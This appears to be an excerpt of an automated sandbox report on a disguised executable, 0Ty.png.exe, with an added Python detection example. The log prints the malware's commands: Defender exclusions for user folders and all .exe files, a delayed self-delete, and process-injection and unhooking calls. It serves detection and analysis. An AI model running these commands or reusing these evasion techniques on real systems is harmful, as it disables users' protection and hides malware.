            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe" (reported twice)
            Source: 0Ty.png.exe | Static PE information: possible double extension: png.exe
            Source: C:\Windows\System32\dialer.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE dialerstager
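The three lines above each carry a behaviour worth turning into a detection: cmd.exe using choice /T as a sleep before deleting the very process that launched it, an image whose name ends in .png.exe, and dialer.exe, a signed Windows binary with no reason to write there, creating a value directly under HKLM\SOFTWARE. The Python below is an added example, not code from the report or the sample. The event records are constructed to resemble Sysmon process-creation and registry-value telemetry, with the command lines, paths and key name copied from the report; treating dialer.exe as a hollowing host is an assumption drawn from this report's own behaviour rather than a general rule.

```python
"""Detection logic for the evasion behaviours recorded in this report.

Added example; not code from the Joe Sandbox report or the sample. The event
records below are constructed to resemble Sysmon process-creation (event 1)
and registry-value (event 13) telemetry, with the command lines, paths and
registry key copied from the report's own lines.
"""
import re
from typing import Dict, List

# "choice /C Y /N /D Y /T 3 & del <file>": choice answers itself after 3 s,
# then del runs, by which time the launching binary has exited and can be removed.
CHOICE_DELAY_RE = re.compile(r"\bchoice\b[^&|]*?/T\s+\d+", re.IGNORECASE)
DEL_TARGET_RE = re.compile(
    r"\b(?:del|erase)\s+(?:/[a-z]\s+)*\"?(?P<path>[^\"&|]+?)\"?\s*(?:&|\||$)",
    re.IGNORECASE,
)
# An image name ending in <document-like>.<executable>, e.g. 0Ty.png.exe.
DOUBLE_EXT_RE = re.compile(
    r"\.(?:png|jpe?g|gif|bmp|pdf|docx?|xlsx?|pptx?|txt|mp[34]|zip)\.(?:exe|scr|com|pif|bat|cmd)$",
    re.IGNORECASE,
)
# Assumption for this example: system binaries this sample runs its code in.
# The report shows dialer.exe writing a value under HKLM\SOFTWARE.
HOLLOWING_HOSTS = {"dialer.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules a process-creation record matches."""
    hits: List[str] = []
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cmd = ev.get("CommandLine", "")
    if _basename(image) == "cmd.exe" and CHOICE_DELAY_RE.search(cmd):
        m = DEL_TARGET_RE.search(cmd)
        if m and m.group("path").strip().lower() == parent.lower():
            hits.append("self_delete_via_choice_delay")   # deletes its own parent image
        elif m:
            hits.append("delayed_delete_via_choice")
    if DOUBLE_EXT_RE.search(_basename(image)):
        hits.append("double_extension_executable")
    return hits


def check_registry_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules a registry-value record matches."""
    hits: List[str] = []
    target = ev.get("TargetObject", "").upper()
    if _basename(ev.get("Image", "")) in HOLLOWING_HOSTS and target.startswith("HKLM\\SOFTWARE\\"):
        hits.append("hollowing_host_writes_hklm_software")
    return hits


# Constructed telemetry; command lines, paths and key name come from the report.
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\0Ty.png.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"'},
    {"Image": r"C:\Users\user\Desktop\0Ty.png.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\user\Desktop\0Ty.png.exe"'},
    {"Image": r"C:\Windows\System32\cmd.exe",           # delayed delete of another file
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c choice /C YN /T 10 /D N & del "C:\Temp\old.log"'},
]
SAMPLE_REGISTRY_EVENTS = [
    {"Image": r"C:\Windows\System32\dialer.exe",
     "TargetObject": r"HKLM\SOFTWARE\dialerstager"},
]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_PROCESS_EVENTS):
        print("process", i, check_process_event(ev))
    for i, ev in enumerate(SAMPLE_REGISTRY_EVENTS):
        print("registry", i, check_registry_event(ev))
```

The self-delete rule compares the del target with the parent image rather than matching on choice alone, because "choice /T n & del" also appears in legitimate cleanup scripts; requiring the deleted path to be the parent keeps the rule specific to a binary erasing itself after handing off to another process.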
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (248 identical events collapsed; this is SetErrorMode with SEM_NOOPENFILEERRORBOX, which .NET hosts such as PowerShell set routinely, so on its own it carries little signal)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\dllhost.exe; Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,68_2_0000000140001860
            Source: C:\Windows\System32\dllhost.exe; Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,73_2_0000000140001860
            Source: C:\Windows\System32\dialer.exe; System information queried: FirmwareTableInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\dllhost.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5356
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4593
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1870
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 8665
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 674
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4042
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1727
            Source: C:\Windows\System32\winlogon.exe; Window / User API: threadDelayed 9970
            Source: C:\Windows\System32\lsass.exe; Window / User API: threadDelayed 9942
            Source: C:\Windows\System32\dwm.exe; Window / User API: threadDelayed 9871
            Source: C:\Windows\System32\dllhost.exe; Window / User API: threadDelayed 560
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe; Dropped PE file which has not been started: C:\Windows\Temp\ihddniqxcjeb.sys
            Source: C:\Windows\System32\dllhost.exe; Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
            Source: C:\Windows\System32\dllhost.exe; Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\dialer.exe; Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
            Source: C:\Windows\System32\dllhost.exe; Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
            Source: C:\Windows\System32\dllhost.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\conhost.exe; API coverage: 5.0 %
            Source: C:\Windows\System32\dialer.exe; API coverage: 0.9 %
            Source: C:\Windows\System32\winlogon.exe; API coverage: 6.0 %
            Source: C:\Windows\System32\lsass.exe; API coverage: 7.7 %
            Source: C:\Windows\System32\svchost.exe; API coverage: 5.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512; Thread sleep count: 5356 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512; Thread sleep count: 4472 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560; Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844; Thread sleep count: 4593 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476; Thread sleep count: 1870 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524; Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1608; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592; Thread sleep count: 8665 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432; Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1104; Thread sleep count: 674 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196; Thread sleep count: 4042 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6868; Thread sleep count: 1727 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\dllhost.exe TID: 6996; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\winlogon.exe TID: 3104; Thread sleep count: 9970 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 3104; Thread sleep time: -9970000s >= -30000s
            Source: C:\Windows\System32\lsass.exe TID: 7424; Thread sleep count: 9942 > 30
            Source: C:\Windows\System32\lsass.exe TID: 7424; Thread sleep time: -9942000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 6788; Thread sleep count: 242 > 30
            Source: C:\Windows\System32\svchost.exe TID: 6788; Thread sleep time: -242000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 7304; Thread sleep count: 9871 > 30
            Source: C:\Windows\System32\dwm.exe TID: 7304; Thread sleep time: -9871000s >= -30000s
            Source: C:\Windows\System32\dllhost.exe TID: 2484; Thread sleep count: 560 > 30
            Source: C:\Windows\System32\dllhost.exe TID: 2484; Thread sleep time: -56000s >= -30000s
            Source: C:\Windows\System32\dllhost.exe TID: 5580; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7444; Thread sleep count: 249 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7444; Thread sleep time: -249000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7592; Thread sleep count: 252 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7592; Thread sleep time: -252000s >= -30000s
            Source: C:\Windows\System32\sc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\sc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\dialer.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
            Source: C:\Windows\System32\lsass.exe; Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe; Last function: Thread delayed
            Source: C:\Windows\System32\dwm.exe; Last function: Thread delayed
            Source: C:\Windows\System32\dllhost.exe; Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe; Code function: 31_2_000002408A29E110 FindFirstFileExW,31_2_000002408A29E110
            Source: C:\Windows\System32\conhost.exe; Code function: 67_2_0000014ECB4AE110 FindFirstFileExW,67_2_0000014ECB4AE110
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC64E110 FindFirstFileExW,69_2_00000225DC64E110
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC67E110 FindFirstFileExW,69_2_00000225DC67E110
            Source: C:\Windows\System32\lsass.exe; Code function: 70_2_00000202C0AEE110 FindFirstFileExW,70_2_00000202C0AEE110
            Source: C:\Windows\System32\svchost.exe; Code function: 71_2_000002A66130E110 FindFirstFileExW,71_2_000002A66130E110
            Source: C:\Windows\System32\dwm.exe; Code function: 72_2_000002BAAEE0E110 FindFirstFileExW,72_2_000002BAAEE0E110
            Source: C:\Windows\System32\dllhost.exe; Code function: 73_2_000002488060E110 FindFirstFileExW,73_2_000002488060E110
            Source: svchost.exe, 00000047.00000002.2938262651.000002A66062A000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Windows\System32\dialer.exe; API call chain: ExitProcess graph end node
            Source: C:\Windows\System32\dllhost.exe; API call chain: ExitProcess graph end node
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
            Source: C:\Windows\System32\conhost.exe; Code function: 31_2_000002408A2981C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002408A2981C0
            Source: C:\Windows\System32\dialer.exe; Code function: 65_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_0000000140832D30
            Source: C:\Windows\System32\dialer.exe; Code function: 24_2_0000000140001C9C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,24_2_0000000140001C9C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exe; Process token adjusted: Debug
            Source: C:\Windows\System32\conhost.exe; Code function: 31_2_000002408A298528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_000002408A298528
            Source: C:\Windows\System32\conhost.exe; Code function: 31_2_000002408A29D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002408A29D6D4
            Source: C:\Windows\System32\dialer.exe; Code function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
            Source: C:\Windows\System32\conhost.exe; Code function: 67_2_0000014ECB4A81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_0000014ECB4A81C0
            Source: C:\Windows\System32\conhost.exe; Code function: 67_2_0000014ECB4AD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_0000014ECB4AD6D4
            Source: C:\Windows\System32\conhost.exe; Code function: 67_2_0000014ECB4A8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,67_2_0000014ECB4A8528
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC6481C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC6481C0
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC64D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC64D6D4
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC648528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,69_2_00000225DC648528
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC6781C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC6781C0
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC67D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC67D6D4
            Source: C:\Windows\System32\winlogon.exe; Code function: 69_2_00000225DC678528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,69_2_00000225DC678528
            Source: C:\Windows\System32\lsass.exe; Code function: 70_2_00000202C0AED6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00000202C0AED6D4
            Source: C:\Windows\System32\lsass.exe; Code function: 70_2_00000202C0AE81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00000202C0AE81C0
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,70_2_00000202C0AE8528
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A66130D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_000002A66130D6D4
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A661308528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,71_2_000002A661308528
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A6613081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_000002A6613081C0
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_000002BAAEE081C0
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE0D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_000002BAAEE0D6D4
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE08528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,72_2_000002BAAEE08528
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_00000248806081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00000248806081C0
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000002488060D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_000002488060D6D4
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000024880608528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,73_2_0000024880608528

            HIPS / PFW / Operating System Protection Evasion

            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 24.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 28.2.powershell.exe.1bff12d0000.12.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 38.3.weiuemyrzjra.exe.1e74f1434b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 62.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 66.2.powershell.exe.28ba5b5ec68.15.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
